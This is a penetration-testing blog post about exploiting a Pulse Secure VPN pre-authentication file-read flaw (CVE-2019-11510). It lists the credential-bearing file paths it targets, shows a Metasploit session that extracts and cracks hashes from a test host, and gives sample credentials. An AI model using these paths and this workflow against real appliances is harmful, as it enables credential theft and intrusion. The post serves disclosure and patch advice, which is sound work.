We exploit Pulse Secure Connect SSL VPN

There has recently been a number of security vulnerabilities in the Pulse Secure Connect SSL-VPN appliance published.

We exploit Pulse Secure Connect SSL VPN

Posted on 2019-09-11 by Peter Bassill in category News.

Pentesting   Exploits   Pulse VPN  

There has recently been a number of security vulnerabilities in the Pulse Secure Connect SSL-VPN appliance published. The vulnerability was initial disclosed by Orange Tsai and Meg Chang. A bit shout out to the pair is well deserved, they spent a lot of time researching this vulnerability.

Recently we were asked to look at how viable the attack is for one of our clients. So, we did.

According to the vulnerability disclosures, the HTML5 module on the appliance has a path traversal vulnerability which will allow us to arbitrarily access all files on the appliance. However, there are no published tools to perform this attack in any way. We changed this my creating a Metasploit Framework module that would perform the initial stages of the attack.

We started by creating a standalone exploit in python and then developed this over the weekend prior to the attack into a Metasploit Framework module for ease. The module would download the following files from any Pulse Secure Connect server:

/data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/runtime/mtmp/lmdb/randomVal/data.mdb /data/runtime/mtmp/lmdb/randomVal/lock.mdb

We would then extract from the data.mdb file any clear text passwords along with the usernames. We would also look through the system file and extract any password hashes for usernames that we did not find a clear text password for.

 =[ metasploit v5.0.38-dev ]  -- --=[ 1912 exploits - 1073 auxiliary - 329 post ]  -- --=[ 545 payloads - 45 encoders - 10 nops ]  -- --=[ 3 evasion ]msf5 > use exploit/http/pulse-securemsf5 exploit(exploit/http/pulse-secure) > set RHOSTS test.hedgehogsecurity.gi msf5 exploit(exploit/http/pulse-secure) > set RPORT 443 msf5 exploit(exploit/http/pulse-secure) > exploit [*] Extracting files from test.hedgehogsecurity.gi[ ] mtmp/system – Success[ ] mtmp/lmdb/dataa/data.mdb –Success [ ] mtmp/lmdb/dataa/lock.mdb –Success [ ] mtmp/lmdb/randomVal/data.mdb –Success [ ] mtmp/lmdb/randomVal/lock.mdb –Success [*] Extracting cleartext passwords[!] FAIL! – No cleartext passwords found[*] Extracting password hashes[*] Using regex (\$1\$danastre\$)(.).*([a-zA-Z] \\[a-z] )[ ] 62 hashes extracted – passing to hashcat server[ ] passwords cracked, check loot.[*] Exploit completed. Checking the loot file, we find a number of MD5 password hashes along with the usernames and the clear text passwords:

$1$danastre$2Zrp.jJlSARuQ5zbrhpMh/:Password1:testuser1 $1$danastre$ky/o1xdYxCo9Qm9/RRSQN/:Password2:testuser2

These are exactly the passwords we used for the test users and logging into the VPN was then very simple.

References https://hackerone.com/reports/591295

CVE-2019-11510: Pre-auth Arbitrary File Reading

CVE-2019-11542: Post-auth Stack Buffer Overflow

CVE-2019-11539: Post-auth Command Injection

CVE-2019-11538: Post-auth Arbitrary File Reading

CVE-2019-11508: Post-auth Arbitrary File Writing

CVE-2019-11540: Post-auth Session Hijacking

Affected Demographic This issue will affect all users any users on the any of the SSL-VPN solution.

Recommendation Apply the patches released for the platform.

Hedgehog Security is a full service Cyber Security consultancy. We are available at all times for all your Penetration Testing requirements. Hedgehog Security is here to help.

Get in Touch

Kindly fill the form and we will get back to you.

Contact us if you are experiencing a Cyber IncidentHaving a Cyber Incident?